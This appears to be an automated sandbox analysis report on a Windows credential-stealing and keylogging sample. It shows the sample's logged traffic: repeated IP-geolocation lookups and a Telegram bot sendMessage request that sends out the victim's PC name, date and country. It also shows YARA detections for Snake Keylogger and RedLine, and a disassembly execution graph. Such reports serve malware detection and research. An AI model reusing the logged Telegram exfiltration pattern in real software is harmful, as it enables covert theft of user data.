                                                                                                                2025-01-10 19:33:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.549716104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 19:33:33 UTC855INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:33 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852402
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JgeTPYahVVOt59oI%2BA1P5aXdktl6EiQ7DnsieX9zeRSpyM8xc7YfFN46HiENu%2FY0T%2BXuRjYDEiKEnNIRa2MB0dGFCWDqJs5uVk99jl6Bv8WP5iJgRgoxjG7oMjKO6Mw3X1vBdKJx"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff19742c4172b9-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1850&rtt_var=709&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1527995&cwnd=217&unsent_bytes=0&cid=0ebd5ff42531e88a&ts=150&x=0"
                                                                                                                2025-01-10 19:33:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.549718104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 19:33:34 UTC853INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:34 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852403
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KA5AdDJfypBuUOga0R8l1ZdxKGnRqJ22y8ZiGgmBP9aBv4CbypYojHLkGdH44vokwsIDZNamHfqxpcVdFvG2R%2FzJZCC8DCbzxxWzjh35MIZKC41FJzICPspjgEPeN90lkDyEB%2BZF"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff197c898d1875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1785&rtt_var=689&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1567364&cwnd=153&unsent_bytes=0&cid=37bb90b8ce9e761a&ts=147&x=0"
                                                                                                                2025-01-10 19:33:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.549720104.21.32.1443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:35 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 19:33:36 UTC862INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 19:33:36 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1852405
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZUq1wcGLhRn%2BShec6ORm%2Bohr099AZU0k3tjcCSShkIkVLsL1it6HE4XMGX7ewpkB8VXCFrLBgqFjAmRXiJ%2FanfpIlvKJQMfQMHreoT7JvpZjkt%2BJxmf3%2B0%2F70Va5WhaGDH%2Ft9lqT"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fff19846e4e4344-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1720&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1697674&cwnd=47&unsent_bytes=0&cid=de8dbd7918a25448&ts=149&x=0"
                                                                                                                2025-01-10 19:33:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.549721149.154.167.220443428C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 19:33:36 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:48:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                Host: api.telegram.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 19:33:37 UTC344INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 19:33:36 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 19:33:37 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:14:33:21
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\Desktop\9L83v5j083.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\9L83v5j083.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:905'878 bytes
                                                                                                                MD5 hash:FA59FC9D6C2AF739EAA63D3AF4D6F428
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2063454139.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:14:33:22
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\9L83v5j083.exe"
                                                                                                                Imagebase:0xf50000
                                                                                                                File size:46'504 bytes
                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4525593506.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4526971369.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.5%
                                                                                                                  Dynamic/Decrypted Code Coverage:1.8%
                                                                                                                  Signature Coverage:4.5%
                                                                                                                  Total number of Nodes:1940
                                                                                                                  Total number of Limit Nodes:40
                                                                                                                  execution_graph 84765 4010e0 84768 401100 84765->84768 84767 4010f8 84769 401113 84768->84769 84771 401184 84769->84771 84772 40114c 84769->84772 84780 401120 84769->84780 84799 401182 84769->84799 84770 40112c DefWindowProcW 84770->84767 84806 401250 61 API calls __cftof2_l 84771->84806 84774 401151 84772->84774 84775 40119d 84772->84775 84778 401219 84774->84778 84779 40115d 84774->84779 84776 4011a3 84775->84776 84777 42afb4 84775->84777 84776->84780 84787 4011b6 KillTimer 84776->84787 84788 4011db SetTimer RegisterWindowMessageW 84776->84788 84808 40f190 10 API calls 84777->84808 84778->84780 84783 401225 84778->84783 84781 401163 84779->84781 84782 42b01d 84779->84782 84780->84770 84813 401000 Shell_NotifyIconW __cftof2_l 84780->84813 84789 42afe9 84781->84789 84790 40116c 84781->84790 84782->84770 84812 4370f4 52 API calls 84782->84812 84815 468b0e 74 API calls __cftof2_l 84783->84815 84786 42b04f 84814 40e0c0 74 API calls __cftof2_l 84786->84814 84807 401000 Shell_NotifyIconW __cftof2_l 84787->84807 84791 401193 84788->84791 84796 401204 CreatePopupMenu 84788->84796 84810 40f190 10 API calls 84789->84810 84790->84780 84798 401174 84790->84798 84791->84767 84796->84767 84809 45fd57 65 API calls __cftof2_l 84798->84809 84799->84770 84800 42afe4 84800->84791 84801 42b00e 84811 401a50 383 API calls 84801->84811 84802 4011c9 PostQuitMessage 84802->84767 84805 42afdc 84805->84770 84805->84800 84806->84791 84807->84802 84808->84791 84809->84805 84810->84801 84811->84799 84812->84799 84813->84786 84814->84799 84815->84800 84816 40bd20 84818 428194 84816->84818 84821 40bd2d 84816->84821 84817 40bd43 84818->84817 84820 4281bc 84818->84820 84823 4281b2 84818->84823 84838 45e987 86 API calls moneypunct 84820->84838 84825 40bd37 84821->84825 84839 4531b1 85 API calls 5 library calls 84821->84839 84837 40b510 VariantClear 84823->84837 84828 40bd50 84825->84828 84827 4281ba 84829 426cf1 84828->84829 84830 40bd63 84828->84830 84849 44cde9 52 API calls _memmove 84829->84849 84840 40bd80 84830->84840 84833 426cfc 84850 40e0a0 84833->84850 84834 40bd73 84834->84817 84836 426d02 84837->84827 84838->84821 84839->84825 84841 40bd8e 84840->84841 84842 40bdb7 _memmove 84840->84842 84841->84842 84843 40bded 84841->84843 84844 40bdad 84841->84844 84842->84834 84860 4115d7 84843->84860 84854 402f00 84844->84854 84848 4115d7 52 API calls 84848->84842 84849->84833 84851 40e0b2 84850->84851 84852 40e0a8 84850->84852 84851->84836 84894 403c30 52 API calls _memmove 84852->84894 84855 402f10 84854->84855 84856 402f0c 84854->84856 84857 4268c3 84855->84857 84858 4115d7 52 API calls 84855->84858 84856->84842 84859 402f51 moneypunct _memmove 84858->84859 84859->84842 84862 4115e1 _malloc 84860->84862 84863 40bdf6 84862->84863 84866 4115fd std::exception::exception 84862->84866 84871 4135bb 84862->84871 84863->84842 84863->84848 84864 41163b 84886 4180af 46 API calls std::exception::operator= 84864->84886 84866->84864 84885 41130a 51 API calls __cinit 84866->84885 84867 411645 84887 418105 RaiseException 84867->84887 84870 411656 84872 413638 _malloc 84871->84872 84879 4135c9 _malloc 84871->84879 84893 417f77 46 API calls __getptd_noexit 84872->84893 84875 4135f7 RtlAllocateHeap 84875->84879 84884 413630 84875->84884 84877 4135d4 84877->84879 84888 418901 46 API calls 2 library calls 84877->84888 84889 418752 46 API calls 8 library calls 84877->84889 84890 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84877->84890 84878 413624 84891 417f77 46 API calls __getptd_noexit 84878->84891 84879->84875 84879->84877 84879->84878 84882 413622 84879->84882 84892 417f77 46 API calls __getptd_noexit 84882->84892 84884->84862 84885->84864 84886->84867 84887->84870 84888->84877 84889->84877 84891->84882 84892->84884 84893->84884 84894->84851 84895 425ba2 84900 40e360 84895->84900 84897 425bb4 84916 41130a 51 API calls __cinit 84897->84916 84899 425bbe 84901 4115d7 52 API calls 84900->84901 84902 40e3ec GetModuleFileNameW 84901->84902 84917 413a0e 84902->84917 84904 40e421 _wcsncat 84920 413a9e 84904->84920 84907 4115d7 52 API calls 84908 40e45e _wcscpy 84907->84908 84923 40bc70 84908->84923 84912 40e4a9 84912->84897 84913 401c90 52 API calls 84915 40e4a1 _wcscat _wcslen _wcsncpy 84913->84915 84914 4115d7 52 API calls 84914->84915 84915->84912 84915->84913 84915->84914 84916->84899 84942 413801 84917->84942 84972 419efd 84920->84972 84924 4115d7 52 API calls 84923->84924 84925 40bc98 84924->84925 84926 4115d7 52 API calls 84925->84926 84927 40bca6 84926->84927 84928 40e4c0 84927->84928 84984 403350 84928->84984 84930 40e4cb RegOpenKeyExW 84931 427190 RegQueryValueExW 84930->84931 84932 40e4eb 84930->84932 84933 4271b0 84931->84933 84934 42721a RegCloseKey 84931->84934 84932->84915 84935 4115d7 52 API calls 84933->84935 84934->84915 84936 4271cb 84935->84936 84991 43652f 52 API calls 84936->84991 84938 4271d8 RegQueryValueExW 84939 4271f7 84938->84939 84941 42720e 84938->84941 84992 402160 84939->84992 84941->84934 84943 41389e 84942->84943 84950 41381a 84942->84950 84944 4139e8 84943->84944 84946 413a00 84943->84946 84969 417f77 46 API calls __getptd_noexit 84944->84969 84971 417f77 46 API calls __getptd_noexit 84946->84971 84947 4139ed 84970 417f25 10 API calls __commit 84947->84970 84950->84943 84956 41388a 84950->84956 84964 419e30 46 API calls __commit 84950->84964 84951 413909 84953 41396c 84951->84953 84955 413929 84951->84955 84953->84943 84954 413967 84953->84954 84957 41397a 84953->84957 84954->84904 84955->84943 84958 413945 84955->84958 84966 419e30 46 API calls __commit 84955->84966 84956->84943 84956->84951 84965 419e30 46 API calls __commit 84956->84965 84968 419e30 46 API calls __commit 84957->84968 84958->84943 84958->84954 84961 41395b 84958->84961 84967 419e30 46 API calls __commit 84961->84967 84964->84956 84965->84951 84966->84958 84967->84954 84968->84954 84969->84947 84970->84954 84971->84954 84973 419f13 84972->84973 84974 419f0e 84972->84974 84981 417f77 46 API calls __getptd_noexit 84973->84981 84974->84973 84979 419f2b 84974->84979 84976 419f18 84982 417f25 10 API calls __commit 84976->84982 84978 40e454 84978->84907 84979->84978 84983 417f77 46 API calls __getptd_noexit 84979->84983 84981->84976 84982->84978 84983->84976 84985 403367 84984->84985 84986 403358 84984->84986 84987 4115d7 52 API calls 84985->84987 84986->84930 84988 403370 84987->84988 84989 4115d7 52 API calls 84988->84989 84990 40339e 84989->84990 84990->84930 84991->84938 84993 426daa 84992->84993 84994 40216b _wcslen 84992->84994 85007 40c600 84993->85007 84997 402180 84994->84997 84998 40219e 84994->84998 84996 426db5 84996->84941 85005 403bd0 52 API calls moneypunct 84997->85005 85006 4013a0 52 API calls 84998->85006 85001 402187 _memmove 85001->84941 85002 4021a5 85003 426db7 85002->85003 85004 4115d7 52 API calls 85002->85004 85004->85001 85005->85001 85006->85002 85008 40c619 85007->85008 85009 40c60a 85007->85009 85008->84996 85009->85008 85012 4026f0 85009->85012 85011 426d7a _memmove 85011->84996 85013 426873 85012->85013 85014 4026ff 85012->85014 85019 4013a0 52 API calls 85013->85019 85014->85011 85016 42687b 85017 4115d7 52 API calls 85016->85017 85018 42689e _memmove 85017->85018 85018->85011 85019->85016 85020 2e423b0 85034 2e40000 85020->85034 85022 2e4245d 85037 2e422a0 85022->85037 85024 2e42486 CreateFileW 85026 2e424da 85024->85026 85028 2e424d5 85024->85028 85027 2e424f1 VirtualAlloc 85026->85027 85026->85028 85027->85028 85029 2e4250f ReadFile 85027->85029 85029->85028 85030 2e4252a 85029->85030 85031 2e412a0 13 API calls 85030->85031 85032 2e4255d 85031->85032 85033 2e42580 ExitProcess 85032->85033 85033->85028 85040 2e43480 GetPEB 85034->85040 85036 2e4068b 85036->85022 85038 2e422a9 Sleep 85037->85038 85039 2e422b7 85038->85039 85041 2e434aa 85040->85041 85041->85036 85042 416454 85079 416c70 85042->85079 85044 416460 GetStartupInfoW 85045 416474 85044->85045 85080 419d5a HeapCreate 85045->85080 85047 4164cd 85048 4164d8 85047->85048 85164 41642b 46 API calls 3 library calls 85047->85164 85081 417c20 GetModuleHandleW 85048->85081 85051 4164de 85052 4164e9 __RTC_Initialize 85051->85052 85165 41642b 46 API calls 3 library calls 85051->85165 85100 41aaa1 GetStartupInfoW 85052->85100 85056 416503 GetCommandLineW 85113 41f584 GetEnvironmentStringsW 85056->85113 85060 416513 85119 41f4d6 GetModuleFileNameW 85060->85119 85062 41651d 85063 416528 85062->85063 85167 411924 46 API calls 3 library calls 85062->85167 85123 41f2a4 85063->85123 85066 41652e 85067 416539 85066->85067 85168 411924 46 API calls 3 library calls 85066->85168 85137 411703 85067->85137 85070 416541 85071 41654c __wwincmdln 85070->85071 85169 411924 46 API calls 3 library calls 85070->85169 85141 40d6b0 85071->85141 85075 41657c 85171 411906 46 API calls _doexit 85075->85171 85078 416581 __commit 85079->85044 85080->85047 85082 417c34 85081->85082 85083 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85081->85083 85172 4178ff 49 API calls _free 85082->85172 85085 417c87 TlsAlloc 85083->85085 85088 417cd5 TlsSetValue 85085->85088 85089 417d96 85085->85089 85087 417c39 85087->85051 85088->85089 85090 417ce6 